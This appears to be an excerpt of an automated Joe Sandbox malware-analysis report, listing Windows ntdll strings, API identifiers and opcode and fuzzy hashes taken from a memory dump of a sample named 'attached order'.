                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          • API String ID: 0-2104531740
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A229
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A21B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                          • API String ID: 2994545307-4008356553
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          • API String ID: 0-1339004836
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #%u
                                                                                          • API String ID: 0-232158463
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EXT-
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AlternateCodePage
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PreferredUILanguages
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kLsE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017CAABF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          Strings
                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B85DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                          Strings
                                                                                          • Critical error detected %lx, xrefs: 017E6BA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Critical error detected %lx
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38abdb3b90f11933a13416b0c4e2dc1d8d63aa5625fe539fa2cdd06497c221cd
                                                                                          • Instruction ID: b1ece250729139e96f066e45bcf60df23af49bfb24d171e2aa3cdfdc3ee7046d
                                                                                          • Opcode Fuzzy Hash: 38abdb3b90f11933a13416b0c4e2dc1d8d63aa5625fe539fa2cdd06497c221cd
                                                                                          • Instruction Fuzzy Hash: C461A071604616AFD715CF69C888BABFBE9FF58710F00461DFA5987344DB30A914CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                          • Instruction ID: ede141ef91028c30c254377eb6f88208c96bd4cacd0d496149e599bae6de9fc8
                                                                                          • Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                          • Instruction Fuzzy Hash: FA518E75E0034A9BCF15CFACD8806FEFBB5FB48310F198169D915A7314DA789A49CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a129c0382ff52cb5f072916dd16d034a8f1524f1c1bf1ba0f3faf98f0080fa88
                                                                                          • Instruction ID: 004f841c5125b494d988fee5d851d5159750cf7ea517952c37a91c5fba6bb9ad
                                                                                          • Opcode Fuzzy Hash: a129c0382ff52cb5f072916dd16d034a8f1524f1c1bf1ba0f3faf98f0080fa88
                                                                                          • Instruction Fuzzy Hash: D751AD716047029BE716DF28C844BABB7E5EF84354F04492CFA9597390EB34EA08CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d949e4b61bc174a3b1470a665048eb77faffab03197f0455481f94530edbab24
                                                                                          • Instruction ID: 296cab12c54e51c38b19a367ac0d11212ef1756afbfb74aa31d83f8b4c37a1f6
                                                                                          • Opcode Fuzzy Hash: d949e4b61bc174a3b1470a665048eb77faffab03197f0455481f94530edbab24
                                                                                          • Instruction Fuzzy Hash: 9E515A71200A06DFCB22EF68C994FAAF7FDFB14744F40056AEA5697261DB30E941CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                          • Instruction ID: f28489861fe6920a2d6ef87ea673b8a0cf8a4898d21782b75f53f1764567e81d
                                                                                          • Opcode Fuzzy Hash: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                          • Instruction Fuzzy Hash: E3513032A40A45EFCB27AF18D845B6AF776FB88A54F1441B9E9018B256CBB4DC01CB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                          • Instruction ID: a16f40361cf0e27c374908e5091d985576e6cc01d7d9bda69673bf1972159161
                                                                                          • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                          • Instruction Fuzzy Hash: 6A518171E0021AABDF55DF98C454FEEFBB5EF44714F144069EA02AB240EBB4D985CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                          • Instruction ID: 264755ef0e5f65c2abfc4f9120ffefea51dc127be12fb11dc85040c20cd2bbdb
                                                                                          • Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                          • Instruction Fuzzy Hash: 4D51A57190021AEFEF219AA4CCC4BEEFBB9AF14724F114665E51167391DB749E408B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                          • Instruction ID: cbb5efdbad8d0aea8ed319f0e589c6463ede1f58106e9d115c71afecd014916b
                                                                                          • Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                          • Instruction Fuzzy Hash: DF5157726083469FD712CF68C884E5BFBE5FB88254F04892DFA9597384D734E905CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a58a4ab3c56aaabf97dbad0d6b23da17b0734f42fded8a157edc3249d95cab98
                                                                                          • Instruction ID: 8d91590aad0138c4512cbef2217bac5c46be0f6fdafdc0ff4dc41b9583a19b24
                                                                                          • Opcode Fuzzy Hash: a58a4ab3c56aaabf97dbad0d6b23da17b0734f42fded8a157edc3249d95cab98
                                                                                          • Instruction Fuzzy Hash: 3F41F5317506119BD729DB2DC898B7BFB9AEF90760F14821CFB1587384DB34D811C6A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e276a9781ac52ae11f7db464178b298d50a7db599837bfce39d61cb981972ff
                                                                                          • Instruction ID: d87bec7b9926f55d80c535309208d6afd243cd61a0e1742e93d613ea86142c14
                                                                                          • Opcode Fuzzy Hash: 2e276a9781ac52ae11f7db464178b298d50a7db599837bfce39d61cb981972ff
                                                                                          • Instruction Fuzzy Hash: EC515B7190021ADFDB32DFA9C4C4A9EF7B9FF58354B248569E945A3309D734AA01CFA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 298469e83004a26029a9509be2c436553a2f7b8ee17bb42368144b2842c4d225
                                                                                          • Instruction ID: 6eb2aec528a22b1b63d6005438a5f7fca7f8de7f4857733a16dcf9d68a5bd76f
                                                                                          • Opcode Fuzzy Hash: 298469e83004a26029a9509be2c436553a2f7b8ee17bb42368144b2842c4d225
                                                                                          • Instruction Fuzzy Hash: D151CC30600206CBEB27CE2CC954629F79DEB81315F58C5AAED8ECB146D635CCC1EB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a489cb8e1ee73165a776604b2d95faa322d704fbea59eea79f14db49cd29980
                                                                                          • Instruction ID: e93b78326708ba701adbfb7cd4b7793ea928875a659a36c574dc6f29418ffeec
                                                                                          • Opcode Fuzzy Hash: 7a489cb8e1ee73165a776604b2d95faa322d704fbea59eea79f14db49cd29980
                                                                                          • Instruction Fuzzy Hash: 6E416B71A403215BCF36EF6DD885B2AFB69EB91708F04902DFD15AB245D7B1DA408B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                          • Instruction ID: 22ede4f4acf07a664cdfa6fb1552d27442046687df22242cbccba0050522d607
                                                                                          • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                          • Instruction Fuzzy Hash: 2641E7726147169FDB25CF28C888A6BF7A9FF84314B14856DEA1A8B344EB30ED14C7D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f10db67bd4efbf9b0a6acf3f209d3534e9d0b7856976d6e3f0c5375bf94f1c0
                                                                                          • Instruction ID: 9b6c1f400a3467bef42478b7e6b5348856c766062517e904a9ec19b729c0b15a
                                                                                          • Opcode Fuzzy Hash: 0f10db67bd4efbf9b0a6acf3f209d3534e9d0b7856976d6e3f0c5375bf94f1c0
                                                                                          • Instruction Fuzzy Hash: 9041BB36915219DFDB14DF98C440AEEFBB8BF48704F1482AAF816E7250D7359D41CBA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a9a1af4b1a02cc8f8945f54e589fe36f33be12b3a77b2aaf6d307c69939deef
                                                                                          • Instruction ID: 89dcb1b8fc450b8d046d26645fe79ce935ff5a934a6f5c2447c1b3ffba1a8fda
                                                                                          • Opcode Fuzzy Hash: 7a9a1af4b1a02cc8f8945f54e589fe36f33be12b3a77b2aaf6d307c69939deef
                                                                                          • Instruction Fuzzy Hash: 2B41E3716043029FDB65DF38D884A1BFBF9FF88214F104869E997C7216DB70E9448B61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                          • Instruction ID: 693d83499f679dfd78548dd6ca2e36e90c9af401800733c3b741643b1d821d24
                                                                                          • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                          • Instruction Fuzzy Hash: E5515A75A00226DFDB15CF99C480AAEF7B1FFC8710F6482A9D815A7391D731AE41CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4625341e57572aabfce81f4d789f43a2531582b08660b83ceb09063ae51a0087
                                                                                          • Instruction ID: 87831d5ea92a2e0ac8418b6a45313d67cb0ff76c49cd407b0f9b5517d06c04c7
                                                                                          • Opcode Fuzzy Hash: 4625341e57572aabfce81f4d789f43a2531582b08660b83ceb09063ae51a0087
                                                                                          • Instruction Fuzzy Hash: 2651C170A00116EBDB36CB28CC09BA9FBB5FF51314F1482A9E519972D7E7749A85CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • API String ID:
                                                                                          • Opcode ID: 098e3620ce08b6df6e51837d55339894fca3b98eba7162f34aa7b0d9cee89464
                                                                                          • Instruction ID: 1479e92a9e27948036a5c535652ad382078dcba2b516e3e9c0cda8005f2a1b38
                                                                                          • Opcode Fuzzy Hash: 098e3620ce08b6df6e51837d55339894fca3b98eba7162f34aa7b0d9cee89464
                                                                                          • Instruction Fuzzy Hash: B431A172E01215AFDB61DEBDC884AAEFBF8FF44650F118469E915D7250D6B0DF009B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5acdf93a25d509154569f649fec9f111021eaca85f3c0b2dc5c87f48c81117fc
                                                                                          • Instruction ID: ba803f1394a6d447e116238eb72b9076f851294df9d5b6d84bb1c16e1d472e1c
                                                                                          • Opcode Fuzzy Hash: 5acdf93a25d509154569f649fec9f111021eaca85f3c0b2dc5c87f48c81117fc
                                                                                          • Instruction Fuzzy Hash: 7031F7366047129BCB23EE28C884E7BFBA5AFD4660F014569FD0597312EB30DC018FA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 09a6f14361f69415a1f9c0d1f36962c33fd2cb540229d173404cf19998b756d9
                                                                                          • Instruction ID: f262344258baaaec3fca47cb5e8095c052c5cdf5f78f5d145239b8700dc7385a
                                                                                          • Opcode Fuzzy Hash: 09a6f14361f69415a1f9c0d1f36962c33fd2cb540229d173404cf19998b756d9
                                                                                          • Instruction Fuzzy Hash: 9B31B0726053429FE760CF19C800B26FBE5FB88710F454AADF98897791D774E948CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                          • Instruction ID: 9211db1f7c8488c12f9bfd905fdac51de41b1a859cda7e3e7d48951428c05145
                                                                                          • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                          • Instruction Fuzzy Hash: 47312772B00B01AFD765CF69D944B57FBE8BB88B50F08096DA99AD3650E630E8008B64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec93ec1af33bafffa568b7b096d0f1a247e4e9e55a73347007c0cd540bd94643
                                                                                          • Instruction ID: f0f0bf0992736827a05c677678e235f0fdf985001316c58b18127921cbb147e6
                                                                                          • Opcode Fuzzy Hash: ec93ec1af33bafffa568b7b096d0f1a247e4e9e55a73347007c0cd540bd94643
                                                                                          • Instruction Fuzzy Hash: B1316871944306CFCB22DF19C44595AFBF2FF89714F0499AEE8889B202D731DA45CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
